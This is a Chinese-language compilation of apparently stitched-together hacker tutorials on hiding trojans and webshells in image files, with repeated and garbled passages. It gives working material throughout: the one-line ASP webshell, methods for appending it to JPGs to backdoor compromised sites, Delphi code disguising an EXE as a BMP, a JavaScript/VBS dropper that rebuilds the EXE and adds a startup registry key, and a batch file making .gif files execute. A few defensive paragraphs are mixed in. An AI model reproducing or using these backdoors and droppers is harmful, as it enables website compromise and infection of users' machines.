黑客技巧之利用图片做木马应用完全解析

图片木马制作的三种方法Copy命令制作1.asp内容：打开cmd，数据一下命令：此时打开两个jpg文件，相比：且打开2.jpg可以像1.jpg一样显示图像。

把以下代码放入目标网站，即可按asp执行。

<% #include files=”2.jpg”%>Uedit32（转载）：本制作来自于：雪糕。

我们通常在得到webshell之后都想给自己留个后门，等下次或以后有用得到的时候再进来看看。

但如果直接加入一句话木马<%execute request("value")%>到asp文件中时，在该页面上就会有类似如下的错误：Microsoft VBScript 运行时错误错误'800a000d'类型不匹配: 'execute'/news1/show.asp，行 3所以我们就可以开动脑筋了，使用插入一句话木马的图片做我们的后门。

而且我们如果有足够的权限的话（希望网站中的文件可写），就直接把网站原有的图片变成后门，然后在那个asp文件中加入调用图片后门的代码：<!--#include file="图片后门地址"-->这样就没有上面的“类型不匹配: 'execute'”错误了，而且也更好的隐藏了我们的后门。

新挑战始终会伴着新事物的出现而出现，当我们直接将我们的一句话木马的asp文件改成jpg 或gif文件的时候，这个图片文件是打不开的，这又容易被管理员发现。

然后我们就又开始思考并寻找新的方法：制作可以显示图片内容的图片格式后门。

制作步骤：一、前期准备材料：1.一张图片：1.jpg2.一句话木马服务器端代码：<%execute request("value")%>（其他的一句话也行）3.一句Script标签：<SCRIPT RUNAT=SERVER LANGUAGE=JA V ASCRIPT>一句话木马服务器端代码</SCRIPT>4. 调用图片后门代码：<!--#include file="图片地址"-->工具：UltraEdit二、开始制作：1.使用UltraEdit打开1.jpg文件，然后按CTRL +F 进行查找图片中的“<%”和“%>”其中<%的十六进制代码是3E 25，那么%>就应该是25 3E，但是我们只把25改成00；之后我们在新建一个文本编辑窗口，将我们的script标签代码<SCRIPT RUNAT=SERVER LANGUAGE=JA V ASCRIPT><%execute request("value")%></SCRIPT>复制进去，然后点击右键选择十六进制编辑命令，这样会跳转到十六进制数据窗口，复制所有的十六进制的数据，粘贴到1.jpg的十六进制编辑窗口的最下面，说明：为什么要粘贴到最下面？假设你把srcipt标签的十六进制代码粘贴到中间的话，就会破坏图片的完整性，那样下面的图片就看不到了，但是插入的一句话代码还是起作用的。

木马攻击原理一、什么是木马攻击？木马（Trojan horse）是一种常见的网络攻击手段，指的是通过在正常的程序或文件中隐藏恶意代码，以实现攻击者的恶意目的。

木马攻击可以隐藏于各种类型的文件中，例如图片、文档、音乐等等，这样一旦用户打开了这些文件，系统就会被感染，攻击者就能够获得对系统的控制权。

二、木马攻击的原理木马攻击的原理可以分为几个步骤：1. 伪装攻击者首先需要伪装木马程序，使其看起来像是一个合法的文件或程序。

他们会使用各种技术手段，例如改变文件的后缀名、隐藏文件扩展名或者伪装成系统程序，以躲避用户的警觉。

2. 传播一旦木马程序被伪装成功，攻击者需要将其传播给目标用户。

他们可以通过电子邮件、社交媒体、广告等途径将木马程序发送给用户。

一旦用户下载并打开了木马程序，系统就会被感染。

3. 植入一旦木马程序被用户打开，恶意代码就会被植入到系统中。

这些代码通常会利用系统的漏洞或者弱点，以获取系统的权限。

一旦攻击者获得了系统的控制权，他们就能够执行各种恶意操作，例如窃取用户的隐私信息、占用系统资源、控制系统行为等等。

4. 控制与劫持一旦木马程序在目标系统中植入成功，攻击者就能够远程控制系统，执行各种恶意操作。

他们可以通过远程命令控制（Remote Command Execution）来操纵系统行为，例如上传下载文件、修改系统配置、操纵网络连接等等。

此外，攻击者还可以劫持用户的网络连接，以拦截用户的通信数据，窃取敏感信息。

三、木马攻击的防范措施木马攻击带来的危害是巨大的，为了保障系统的安全，我们需要采取以下防范措施：1. 使用安全的密码使用强密码是防止木马攻击的第一步。

确保密码的复杂性，并不断更换密码，避免使用容易猜测的密码。

2. 安装防火墙和杀毒软件安装防火墙和杀毒软件可以有效阻止木马程序的入侵。

这些软件可以检测系统中的可疑活动，并及时阻止其执行。

3. 及时打补丁保持系统和软件的更新也非常重要。

及时打补丁可以修复系统中的漏洞和弱点，从而减少被木马攻击的概率。

黑客是如何骗取你执行木马的如今大多数上网的朋友警惕性都很高，想骗取他们执行木马是件很困难的事，因为木马出现这么久，木马两个字听得人们耳朵都长出了老茧，可说是谈"马"色变，即使不是电脑高手都知道，一见到是exe 文件便不会轻易"招惹"它，因而中标的机会也就相对减少了。

对于此，黑客们是不会甘于寂寞的，在黑客的世界里挑战与刺激才是他们趋之若婺的。

1、冒充为图像文件首先，黑客最常使用骗别人执行木马的方法，就是将特洛伊木马说成为图像文件，比如说是照片等，应该说这是一个最不合逻辑的方法，但却是最多人中招的方法，有效而又实用。

只要入侵者扮成美眉及更改服务器程序的文件名(例如sam.exe )为"类似"图像文件的名称，再假装传送照片给受害者，受害者就会立刻执行它。

为甚么说这是一个不合逻辑的方法呢？图像文件的扩展名根本就不可能是exe，而木马程序的扩展名基本上又必定是exe ，明眼人一看就会知道有问题，多数人在接收时一看见是exe文件，便不会接收了，那有什么方法呢? 其实方法很简单，他只要把文件名改变，例如把"sam.exe" 更改为"sam.jpg" ，那么在传送时，对方只会看见sam.jpg 了，而到达对方电脑时，因为windows 默认值是不显示扩展名的，所以很多人都不会注意到扩展名这个问题，而恰好你的计算机又是设定为隐藏扩展名的话，那么你看到的只是sam.jpg 了，受骗也就在所难免了!还有一个问题就是，木马本身是没有图标的，而在电脑中它会显示一个windows 预设的图标，别人一看便会知道了！但入侵者还是有办法的，这就是给文件换个"马甲"，即修改文件图标。

修改文件图标的方法如下:1 . 比如到 下载一个名为IconForge 的软件，再进行安装。

2 . 执行程序，按下File > Open3 . 在File Type 选择exe 类4 . 在File > Open 中载入预先制作好的图标( 可以用绘图软件或专门制作icon 的软件制作，也可以在网上找找) 。

图片木马制作的三种方法Copy命令制作1.asp内容：打开cmd，数据一下命令：此时打开两个jpg文件，相比：且打开2.jpg可以像1.jpg一样显示图像。

把以下代码放入目标网站，即可按asp执行。

<% #include files=”2.jpg”%>Uedit32（转载）：本制作来自于：雪糕。

我们通常在得到webshell之后都想给自己留个后门，等下次或以后有用得到的时候再进来看看。

但如果直接加入一句话木马<%execute request("value")%>到asp文件中时，在该页面上就会有类似如下的错误：Microsoft VBScript 运行时错误错误'800a000d'类型不匹配: 'execute'/news1/show.asp，行 3所以我们就可以开动脑筋了，使用插入一句话木马的图片做我们的后门。

而且我们如果有足够的权限的话（希望网站中的文件可写），就直接把网站原有的图片变成后门，然后在那个asp文件中加入调用图片后门的代码：<!--#include file="图片后门地址"-->这样就没有上面的“类型不匹配: 'execute'”错误了，而且也更好的隐藏了我们的后门。

新挑战始终会伴着新事物的出现而出现，当我们直接将我们的一句话木马的asp文件改成jpg 或gif文件的时候，这个图片文件是打不开的，这又容易被管理员发现。

然后我们就又开始思考并寻找新的方法：制作可以显示图片内容的图片格式后门。

制作步骤：一、前期准备材料：1.一张图片：1.jpg2.一句话木马服务器端代码：<%execute request("value")%>（其他的一句话也行）3.一句Script标签：<SCRIPT RUNAT=SERVER LANGUAGE=JA V ASCRIPT>一句话木马服务器端代码</SCRIPT>4. 调用图片后门代码：<!--#include file="图片地址"-->工具：UltraEdit二、开始制作：1.使用UltraEdit打开1.jpg文件，然后按CTRL +F 进行查找图片中的“<%”和“%>”其中<%的十六进制代码是3E 25，那么%>就应该是25 3E，但是我们只把25改成00；之后我们在新建一个文本编辑窗口，将我们的script标签代码<SCRIPT RUNAT=SERVER LANGUAGE=JA V ASCRIPT><%execute request("value")%></SCRIPT>复制进去，然后点击右键选择十六进制编辑命令，这样会跳转到十六进制数据窗口，复制所有的十六进制的数据，粘贴到1.jpg的十六进制编辑窗口的最下面，说明：为什么要粘贴到最下面？假设你把srcipt标签的十六进制代码粘贴到中间的话，就会破坏图片的完整性，那样下面的图片就看不到了，但是插入的一句话代码还是起作用的。

巧用技巧揪出图片背后的木马病毒导读:木马病毒属于病毒的一类，主要是进行盗取账号密码信息、远程控制用户电脑、破坏操作系统等操作。

并且，为了防止杀毒软件对它的查杀，通常具有很强的隐蔽性和反侦察性。

多数木马病毒感染后，首先试图强行关闭杀毒软件，然后才开始盗取账号，有的木马病毒甚至会将国内外主流杀毒软件先各个击破。

最近一段时间，从各大杀毒软件厂商发布的病毒报告中可以看到，木马病毒目前在互联网上泛滥情况十分严重，并且已经形成完整的病毒产业链。

它是如何入侵电脑?作为普通网民又应如何防范?有许多的用户发现自己的电脑有问题，但却找不出原因，是中了木马不假，但就是找不出是哪的问题，后来监测到有数据在上传时，在图片中找到了藏于其中的木马病毒，也终于把它揪出来了。

看一下具体内容：攻击者利用微软GDIplus安全漏洞将木马藏于图片中，注意是藏而不是捆绑，这个不同于以前把木马伪装成图片，引诱网民去点击，而是实实在在的图片变成了木马。

受微软GDIplus安全漏洞影响，几乎所有浏览器、即时聊天工具、Office 程序以及看图软件等都可能成为木马传播的渠道。

只要通过浏览器浏览、看图软件打开、甚至是QQ、MSN、电子邮件、Office文档里查看这些图片，就会中招!管你是一个QQ表情还是一个有着上万个层的PNG图片，看了就木马你!这个安全漏洞就是微软GDIplus图片漏洞，堪称是微软有史以来最大的安全漏洞。

GDIplus是一种图形设备接口，能够为应用程序和程序员提供二维矢量图形、映像和版式。

GdiPlus.dll通过基于类的API提供对各种图形方式的访问。

它在解析特制的BMP文件时存在整数溢出漏洞，利用此漏洞的攻击者可完全控制系统，可通过这个漏洞安装更多的木马程序;查看、更改或删除数据;或者创建拥有完全用户权限的新帐户。

这个GDIplus漏洞非常严重，类似以前的光标漏洞和wmf 漏洞，但是涉及范围广，几乎涵盖了所有的图形格式。

了解了以上的问题，电脑用户就要慎重对待自己收到的图片了，一定要先杀一杀病毒再打开，以防中招，但这个问题也是可以解决的，因为微软GDIplus安全漏洞的专门补丁也已出现了，只要下载运行就把问题化险为夷了。

木马采用的伪装方法1. 修改图标木马服务端所用的图标也是有讲究的，木马经常故意伪装成了XT.HTML等你可能认为对系统没有多少危害的文件图标，这样很容易诱惑你把它打开。

看看，木马是不是很狡猾?2. 捆绑文件这种伪装手段是将木马捆绑到一个安装程序上，当安装程序运行时，木马在用户毫无察觉的情况下，偷偷地进入了系统。

被捆绑的文件一般是可执行文件（即EXE COM一类的文件）。

3. 出错显示有一定木马知识的人部知道，如果打开一个文件，没有任何反应，这很可能就是个木马程序。

木马的设计者也意识到了这个缺陷，所以已经有木马提供了一个叫做出错显示的功能。

当服务端用户打开木马程序时，会弹出一个错误提示框（这当然是假的），错误内容可自由定义，大多会定制成一些诸如" 文件已破坏，无法打开!" 之类的信息，当服务端用户信以为真时，木马却悄悄侵人了系统。

4. 自我销毁这项功能是为了弥补木马的一个缺陷。

我们知道，当服务端用户打开含有木马的文件后，木马会将自己拷贝到Windows的系统文件夹中（C;\wmdows或C:\windows'system 目录下）,一般来说，源木马文件和系统文件夹中的木马文件的大小是一样的（捆绑文件的木马除外），那么，中了木马的朋友只要在近来收到的信件和下载的软件中找到源木马文件，然后根据源木马的大小去系统文件夹找相同大小的文件，判断一下哪个是木马就行了。

而木马的自我销毁功能是指安装完木马后，源木马文件自动销毁，这样服务端用户就很难找到木马的来源，在没有查杀木马的工具帮助下。

就很难删除木马了。

5. 木马更名木马服务端程序的命名也有很大的学问。

如果不做任何修改，就使用原来的名字，谁不知道这是个木马程序呢?所以木马的命名也是千奇百怪，不过大多是改为和系统文件名差不多的名字，如果你对系统文件不够了解，那可就危险了。

例如有的木马把名字改为window.exe ，如果不告诉你这是木马的话，你敢删除吗?还有的就是更改一些后缀名，比如把dll 改为dl 等，不仔细看的，你会发现吗?木马的种类1 、破坏型惟一的功能就是破坏并且删除文件，可以自动的删除电脑上的DLL INI、EXE文件。

木马是大家网上安全的一大隐患，说是大家心中永远的痛也不为过。

对于木马采用敬而远之的态度并不是最好的方法，我们必须更多地了解其“习性”和特点，只有这样才能做到“知己知彼，百战不殆”！随着时间的推移，木马的植入方式也悄悄地发生了一定的变化，较之以往更加的隐蔽，对大家的威胁也更大，以下是笔者总结的五种最新的木马植入方式，以便大家及时防范。

方法一：利用共享和Autorun文件为了学习和工作方便，有许多学校或公司的局域网中会将硬盘共享出来。

更有甚者，竟将某些硬盘共享设为可写！这样非常危险，别人可以借此给您下木马！利用木马程序结合Autorun.inf文件就可以了。

方法是把Autorun.inf和配置好的木马服务端一起复制到对方D 盘的根目录下，这样不需对方运行木马服务端程序，只需他双击共享的磁盘图标就会使木马运行！这样作对下木马的人来说的好处显而易见，那就是大大增加了木马运行的主动性！许多人在别人给他发来可执行文件时会非常警惕，不熟悉的文件他们轻易不会运行，而这种方法就很难防范了。

下面我们简单说一下原理。

大家知道，将光盘插入光驱会自动运行，这是因为在光盘根目录下有个Autorun.inf文件，该文件可以决定是否自动运行其中的程序。

同样，如果硬盘的根目录下存在该文件，硬盘也就具有了AutoRun功能，即自动运行Autorun.inf文件中的内容。

把木马文件.exe文件以及Autorun.inf放在磁盘根目录（这里假设对方的D盘共享出来且可写），对于给您下木马的人来说，他还会修改Autorun.inf文件的属性，将该文件隐藏起来。

这样，当有人双击这个盘符，程序就运行了。

这一招对于经常双击盘符进入“我的电脑”的人威胁最大。

更进一步，利用一个.REG文件和Autorun.inf结合，还可以让你所有的硬盘都共享出去！方法二：把木马文件转换为BMP格式这是一种相对比较新颖的方式，把EXE转化成为BMP来欺骗大家。

其原理是：BMP文件的文件头有54个字节，包括长度、位数、文件大小、数据区长度。

木马常见植入方法大曝光对于给你下木马的人来说，一般不会改变硬盘的盘符图标，但他会修改Autorun.inf文件的属性，将该文件隐藏起来。

然后按F5键刷新，这样，当有人双击这个盘符，程序就运行了。

这一招对于经常双击盘符进入“我的电脑”的人最有效。

识别这种伪装植入方式的方法是，双击盘符后木马程序会运行，并且我们不能进入盘符。

4把木马文件转换为图片格式这是一种相对比较新颖的方式，把EXE转化成为BMP图片来欺骗大家。

原理：BMP文件的文件头有54个字节，包括长宽、位数、文件大小、数据区长度。

我们只要在EXE的文件头上加上这54字节，IE就会把它当成BMP文件下载下来。

改过的图片是花的，会被人看出破绽，用＜imgscr＝″xxx.bmp″higth＝″0″width＝″0″＞，把这样的标签加到网页里，就看不见图片了，也就无法发现“图片”不对劲。

IE 把图片下载到临时目录，我们需要一个JavaScript文件在对方的硬盘里写一个VBS文件，并在注册表添加启动项，利用那个VBS找到BMP，调用debug来还原EXE，最后，运行程序完成木马植入。

下一次启动时木马就运行了，无声无息非常隐蔽。

5伪装成应用程序扩展组件此类属于最难识别的特洛伊木马，也是骗术最高的木马。

特洛伊木马编写者用自己编制的特洛伊DLL替换已知的系统DLL，并对所有的函数调用进行过滤。

对于正常的调用，使用函数转发器直接转发给被替换的系统DLL，对于一些事先约定好的特殊情况，DLL会执行一些相对应的操作。

一个比较简单的方法是启动一个进程，虽然所有的操作都在DLL中完成会更加隐蔽，但是这大大增加了程序编写的难度。

实际上这样的木马大多数只是使用DLL进行监听，一旦发现控制端的连接请求就激活自身，起一个绑端口的进程进行正常的木马操作。

操作结束后关掉进程，继续进入休眠状况。

举个具体的例子，黑客们将写好的文件（例如DLL、OCX等）挂在一个十分出名的软件中，例如QQ中。

木马的常用伪装手段
1木马程序更名：为增强木马程序的欺骗性，木马的设计者通常会给木马取一个极具迷
惑性的名称（一般与系统文件名相似，如svchOst。

Exe等）或者允许控制端用户自由设定安装后的木马文件名。

这就使得用户很难判断所感染的木马类型。

2扩展名欺骗：这是黑客惯用的一种手法，其主要是将木马伪装成图片、文本、Word
文档等文件，以掩饰自己真实的文件类型，例如将木马程序的名称为“文件名.exe”的文件改为“文件名.txt.exe”。

此时，用户只需把该文件的扩展名显示出来，就可以轻松识别出此文件的类型。

3修改程序图标：木马服务端所用的图标有一定的规律可循，木马经常故意伪装成常用
图标的形式（例如文本文件的图标），等待用户因为疏忽而将其认为是应用程序图标而双击启动。

4捆绑文件：这种方式是将木马捆绑到一个安装程序中，当用户双击启动程序时，木马
就会随之启动，并运行于计算机系统中。

被捆绑的文件一般是可执行文件，例如后缀名为“.Exe”，“.COM”之类的文件。

5定制端口：老式木马的端口都是固定的，这位用户判断电脑是否带有木马带来了方便。

现在很多木马都加入了定制端口的功能，控制端用户可以在“1024-65535”之间任意选择一个端口作为木马端口，这样大大提高了用户判断电脑感染木马类型的难度。

6自我复制：是为了弥补木马的一个缺陷而设计的当服务端用户打开含有木马的文件后，
木马会将自己复制到系统目录中（C;\WINDOWS\System或C;\WINDOWS\System32目录）。

另类⽹站⼊侵之⼀句话⽊马图⽚的妙⽤这篇⽂章有点标题党了，⼀句话⽊马⼤家都不陌⽣，我想很多菜菜都体验过他的强⼤之处吧。

提起⼀句话我们不由得想起了laker⼤侠啊。

可以说laker⼤侠的⼀句话⽊马真是为我们⼴⼤脚本⼊侵者带来不少的⽅便。

今天我要讲述的这个⼊侵过程就和⼀句话⽊马密不可分，说到这⼤家应该都知道最终拿下这个站的的⽅法肯定是利⽤⼀句话了。

不过这个站我还是费了好⼤周折才成功拿下⼀句话的。

下⾯让我们⼀起回顾下整个过程吧。

不会熟练使⽤⼀句话的⼩菜们可要认真看了，能熟练运⽤⼀句话的⼤虾们也不要骄傲，说不定下⾯的⽅法就是你没有尝试过的哦。

好了，事情起因还是以⼩菜拿到了⽹站后台没法拿webshell，找我求助来了，我们还是先到⽹站后台看看到底是什么样⼀个状况吧。

⽹址我就不发出来了，免得有些⼈品不好的⼩菜们拿去搞破坏。

是⼀个什么电⼦商城的后台，不过我之前在前台看了下给⼈的感觉就是不怎么样，刚那⼩菜应该就是通过注⼊漏洞拿到的账号和密码。

⼤约在后台看了下基本情况，寻找可利⽤的信息，有⼀个ewebeditor的编辑器，不过貌似是2.16以上版本的，不存在注⼊漏洞；另外有⼀个图⽚上传的功能；还有⼀个数据库备份恢复功能，⼤致这些地⽅都是可以利⽤的。

不过ewebeditor我已经尝试了，默认登录界⾯删除，数据库名称更改不可下载。

admin_style.asp⽂件验证⽅式独⽴，没有与主站后台使⽤同⼀种验证，有的⽹站的ewebeditor的后台验证与⽹站后台⼀直，这就导致登录⽹站后台后就可以直接访问编辑器后台程序。

另外就是数据库备份，⼤家可以看下图：可见该备份功能不可⾃定义源数据库路径名称及备份致的数数据库路径或名称，不过当时看到这⾥我⼼理⾯有了⼀个想法就是既然不可以⾃⼰定义路径及名称，我可以⾃⼰抓包然后更改数据库后提交。

这个⽅法我以前在其他⽹站上有试过，⽽且成功过。

主要就是针对类似的数据库备份功能，使⽤抓包⼯具抓下来然后更改后再⽤NC提交。

何谓BMP网页木马？它和过去早就用臭了的MIME头漏洞的木马不同，MIME木马是把一个EXE文件用MIME编码为一个EML(OUT LOOK信件)文件，放到网页上利用IE和OE的编码漏洞实现自动下载和执行。

然而BMP木马就不同，它把一个EXE文件伪装成一个BMP图片文件，欺骗IE自动下载，再利用网页中的JAVASCRIPT脚本查找客户端的Internet临时文件夹，找到下载后的BMP文件,把它拷贝到TEMP目录。

再编写一个脚本把找到的BMP文件用DEBUG还原成EXE，并把它放到注册表启动项中，在下一次开机时执行.但是这种技术只能在9X下发挥作用，对于2K、XP来说是无能为力了。

看上去好象很复杂,下面我们一步一步来:1) EXE变BMP的方法大家自己去查查BMP文件资料就会知道，BMP文件的文件头有54个字节，简单来说里面包含了BMP文件的长宽、位数、文件大小、数据区长度。

我们只要在EXE文件的文件头前面添加相应的BMP文件头(当然BMP文件头里面的数据要符合EXE文件的大小啦)，这样就可以欺骗IE下载该BMP文件，开始我们用JPG文件做过试验，发现如果文件头不正确的话，是不会下载的，转换代码如下：FindFirstFile(Pchar(ParamStr(1)),fd); fs:=fd.nFileSizeLow;col := 4;while true do beginif (fs mod 12)=0 then beginlen:=fs;end else len:=fs+12-(fs mod 12);row := len div col div 3;if row>col then begincol:=col+4;end else Break;end;FillChar(buffer,256,0);{一下为BMP文件头数据}Buffer[0]:='B';Buffer[1]:='M'; PDWORD(@buffer[18])^:=col;PDWORD(@buffer[22])^:=row;PDWORD(@buffer[34])^:=len;PDWORD(@buffer[2])^:=len+54; PDWORD(@buffer[10])^:=54;PDWORD(@buffer[14])^:=40;PWORD(@buffer[26])^:=1;以上代码可以在DELPHI4,5,6中编译 ,就可以得到一个exe2bmp.exe文件.大家打开MSDOS方式,输入exe2bmp myexe.exe mybmp.bmp回车就可以把第二个参数所指定的EXE文件转换成BMP格式.接着就是把这个BMP图片放到网页上了,如果大家打开过这张图片的话,一定发现这张BMP又花,颜色又单调.所以大家放在网页上最好用这样的格式以下是放在网页上的脚本var st=fso.CreateTextFile(vbs,true);st.WriteLine('Option Explicit');st.WriteLine('Dim FSO,WSH,CACHE,str');st.WriteLine('Set FSO =CreateObject("Scripting.FileSystemObject")');st.WriteLine('Set WSH = CreateObject("WScript.Shell")');st.WriteLine('CACHE=wsh.RegRead("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\ShellFolders\\Cache")'); st.WriteLine('wsh.RegDelete("HKCU\\Software\\Microsoft\\Windows \\CurrentVersion\\Run\\vbs")');st.WriteLine ('wsh.RegWrite "HKCU\\Software\\Microsoft\\Windows \\CurrentVersion\\Run\\tmp","tmp.exe"');st.WriteLine('SearchBMPFilefso.GetFolder(CACHE),"mybmp[1].bmp"');st.WriteLine('WScript.Quit()');st.WriteLine('Function SearchBMPFile(Folder,fname)');st.WriteLine(' Dim SubFolder,File,Lt,tmp,winsys');st.WriteLine(' str=FSO.GetParentFolderName(folder) &"\\" & & "\\" & fname');st.WriteLine(' if FSO.FileExists(str) then');st.WriteLine(' tmp=fso.GetSpecialFolder(2) & "\\"');st.WriteLine(' winsys=fso.GetSpecialFolder(1) & "\\"');st.WriteLine(' set File=FSO.GetFile(str)');st.WriteLine(' File.Copy(tmp & "tmp.dat")');st.WriteLine(' File.Delete');st.WriteLine(' set Lt=FSO.CreateTextFile(tmp & "tmp.in")');st.WriteLine(' Lt.WriteLine("rbx")');st.WriteLine(' Lt.WriteLine("0")');st.WriteLine(' Lt.WriteLine("rcx")');st.WriteLine(' Lt.WriteLine("1000")');st.WriteLine(' Lt.WriteLine("w136")');st.WriteLine(' Lt.WriteLine("q")');st.WriteLine(' Lt.Close');st.WriteLine(' WSH.Run "command /c debug " & tmp & "tmp.dat<" & tmp & "tmp.in >" & tmp & "tmp.out",false,6');st.WriteLine(' On Error Resume Next ');st.WriteLine(' FSO.GetFile(tmp & "tmp.dat").Copy(winsys & "tmp.exe")');st.WriteLine(' FSO.GetFile(tmp & "tmp.dat").Delete');st.WriteLine(' FSO.GetFile(tmp & "tmp.in").Delete');st.WriteLine(' FSO.GetFile(tmp & "tmp.out").Delete');st.WriteLine(' end if');st.WriteLine(' If Folder.SubFolders.Count <> 0 Then');st.WriteLine(' For Each SubFolder In Folder.SubFolders');st.WriteLine(' SearchBMPFile SubFolder,fname');把该脚本保存为"js.js",在网页中插入:该脚本主要会在本地机器的SYSTEM目录下生成一个“S.VBS”文件，该脚本文件会在下次开机时自动运行。

黑客攻防：网页挂马攻防全接触网页挂马是攻击者惯用的入侵手段，其影响极其恶劣。

不仅让站点管理者蒙羞，而且殃及池鱼使站点的浏览者遭殃。

不管是站点维护者还是个人用户，掌握、了解一定的网页挂马及其防御技术是非常必要的。

1、关于网页挂马网页挂马就是攻击者通过在正常的页面中（通常是网站的主页）插入一段代码。

浏览者在打开该页面的时候，这段代码被执行，然后下载并运行某木马的服务器端程序，进而控制浏览者的主机。

2、获取Webshell攻击者要进行网页挂马，必须要获取对站点文件的修改权限，而获取该站点Webshell是最普遍的做法。

其实可供攻击者实施的攻击手段比较多，比如注入漏洞、跨站漏洞、旁注漏洞、上传漏洞、暴库漏洞和程序漏洞都可被利用。

下面就列举一个当前比较流行的eWEBEditor在线HTML编辑器上传漏洞做个演示和分析。

1）.网站入侵分析eWEBEditor是一个在线的HTML编辑器，很多网站都集成这个编辑器，以方便发布信息。

低版本的eWEBEditor在线HTML编辑器，存在者上传漏洞，黑客利用这点得到WEBSHELL（网页管理权限）后，修改了网站，进行了挂马操作。

其原理是：eWEBEditor的默认管理员页面没有更改，而且默认的用户名和密码都没有更改。

攻击者登陆eWEBEditor后，添加一种新的样式类型，然后设置上传文件的类型，加入asp文件类型，就可以上传一个网页木马了。

（图1）2）.判断分析网页漏洞（1）.攻击者判断网站是否采用了eWEBEditor的方法一般都是通过浏览网站查看相关的页面或者通过搜索引擎搜索类似"ewebeditor.asp？id="语句，只要类似的语句存在，就能判断网站确实使用了WEB编辑器。

（2）.eWEBEditor编辑器可能被黑客利用的安全漏洞：a.管理员未对数据库的路径和名称进行修改，导致黑客可以利用编辑器默认路径直接对网站数据库进行下载。

b.管理员未对编辑器的后台管理路径进行修改导致黑客可以通过数据库获得的用户名和密码进行登陆。

做⼀个图⽚马的四种⽅法（详细步骤）
简介
图⽚马:就是在图⽚中隐藏⼀句话⽊马。

利⽤.htaccess等解析图⽚为PHP或者asp⽂件。

达到执⾏图⽚内代码⽬的
制作⽅法:
1. ⽂本⽅式打开,末尾粘贴⼀句话⽊马
2. cmd中 copy 1.jpg/b+2.php
3.jpg
/b是⼆进制形式打开
/a是ascii⽅式打开
看到有⼈说⼀定要把图⽚放前⾯,⽊马放后⾯才能成功,我亲⾃试了这两种制作⽅式(另⼀种图⽚放后⾯),均能成功连接,但是后者的⼀句话⽊马在⽂件开头,不推荐
3. 16进制打开图⽚在末尾添加⼀句话⽊马。

4. ps
注意以下⼏点:
单纯的图⽚马并不能直接和蚁剑连接，
因为该⽂件依然是以image格式进⾏解析，
只有利⽤⽂件包含漏洞，才能成功利⽤该⽊马
所谓⽂件包含漏洞，是指在代码中引⼊其他⽂件作为php⽂件执⾏时，未对⽂件进⾏严格过滤，导致⽤户指定任意⽂件，都作为php⽂件解析执⾏。

1.⽂本⽅式打开图⽚直接粘贴⼀句话⽊马
将⼀个图⽚以⽂本格式打开(这⾥⽤的notepad++.以记事本⽅式打开修改也能连接成功,不过修改后图⽚⽆法正常显⽰了),
后⾯粘贴上⼀句话⽊马
上传图⽚
连接蚁剑,嗯,很好,连接成功
2.cmd命令⾏执⾏
在windows的cmd中执⾏
可以看到末尾已经有⼀句话⽊马了
上传之后连接试试,成功
3.⽤16进制编辑器打开,末尾添加⽤winhex打开图⽚,添加⼀句话⽊马
上传,连接成功
4.⽤PhotoShop制作先打开图⽚
点击⽂件->⽂件简介
添加⽊马
上传,连接成功。

图片文件捆绑木马揭秘作者：刘英来源：《电脑爱好者》2011年第22期听说图片文件可以携带木马侵入用户的电脑图谋不轨，但一直没有亲自遇到过。

上星期遇到的事情，让我有机会亲身经历了与木马图片的正面碰撞，彻底解开了这一谜团。

偶用木马某日，朋友突然向我求救，说网络游戏的号被盗了。

由于朋友是在家上网的，排除了在公共场所账号和密码被别人偷窥的可能。

据朋友说，被盗之前的半日内她一直没有安装什么软件，也没有上网浏览，只是在埋头用Word写工作总结，但在被盗的前一个小时，她根据自动通知栏内的信息，收到一封精美的邮件，附件中显示有一幅照片的打包文件，邮件正文声称说这幅图片是不明飞行物扔下来的稀世珍宝的照片。

根据这封邮件驴唇不对马嘴的描述，朋友怀疑是不是这封邮件有问题。

我了解到，收到邮件后，朋友是用WinXP自带的“Windows图片和传真查看器”打开的照片，并肯定这是一幅照片文件没问题，而且看得清清楚楚后缀名是.gif格式。

电话中得知，朋友的那封邮件还在。

于是，我让朋友把那封邮件给我转发一封，我要看个究竟。

因为已经怀疑问题发生在这封邮件上，所以我对邮件内容十分小心谨慎。

由于怀疑问题发生在这封邮件的图片附件上，所以，我根本不打算去直接浏览这幅图片。

分析木马打开邮件，解压附件中的RAR压缩包后，我发现了附件中的那个文件其实并不是朋友所说的gif文件，命名是一个exe文件，文件名是“新奇照片.gif.exe”，并且它的图标也是图片文件的图标。

这下我明白了，原来朋友的电脑使用了系统默认的开启“隐藏已知文件类型的扩展名”的选项（在“我的电脑”窗口之“工具→文件夹选项→查看→高级设置”中）（见图1），所以她告诉我的后缀名gif其实不是真正的文件后缀名，这只是一个假象。

而我的电脑，为了防止恶意软件在作怪，文件名后缀显示和隐含文件显示这两个选项早已被我打开了，因而对收到的任何在后缀名上做过手脚的文件均一览无余。

知道问题可能发生在这个文件的后缀上，问题就好办了，我不打算直接运行这个exe文件，但是，我要剖开这个文件看看它里面到底藏有什么阴谋。

你见过gif、jpg、jpeg、bmp等后缀文件当做木马你见过gif、jpg、jpeg、bmp等后缀文件当做木马来运行吗？一个小技巧可以把任意后缀文件当做EXE程序文件来运行。

更改exe为gif：@echo offcolor 1AECHO Windows Registry Editor Version 5.00>gif.regECHO [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.gif]》gif.regECHO “Content Type”=“application/x-msdownload”》gif.regECHO @=“exefile”》gif.regregedit /s gif.reg>nul 2>nuldel /s gif.reg>nul 2>nul这个代码保存成。

BAT的文件。

先运行这个BAT文件系统会把。

GIF文件来当做应用程序来运行当然我们的木马后缀要换成。

GIF 的，嘻嘻。

恢复gif默认：@echo offcolor 1AECHO Windows Registry Editor Version 5.00>gif.regECHO [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.gif]》gif.regECHO “Content Type”=“image/gif”》gif.regECHO @=“giffile”》gif.regregedit /s gif.reg>nul 2>nuldel /s gif.reg>nul 2>nul这个代码保存成。

BAT的文件。

大家可以发挥想象，有很多可以利用的地方。

环境变量的利用。

有时候我们在webshell下查看系统变量的时候总能得到一些惊喜，比如系统默认的是Path这个环境变量的值是：%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\S ystem32\Wbem;假如系统装过php的话，那么它的环境变量可能是c:\php\;%SystemRoot%\system32;%SystemRoot%;%SystemRoot %\System32\Wbem;那么我们就有机可乘了，因为它的顺序在系统默认的路径前面。

恶意代码分析是一项重要的安全工作，它有助于了解和应对各种网络威胁。

而图像处理技术在恶意代码分析中的应用，可以提供更深入、更全面的信息，帮助分析人员更好地理解和防范这些威胁。

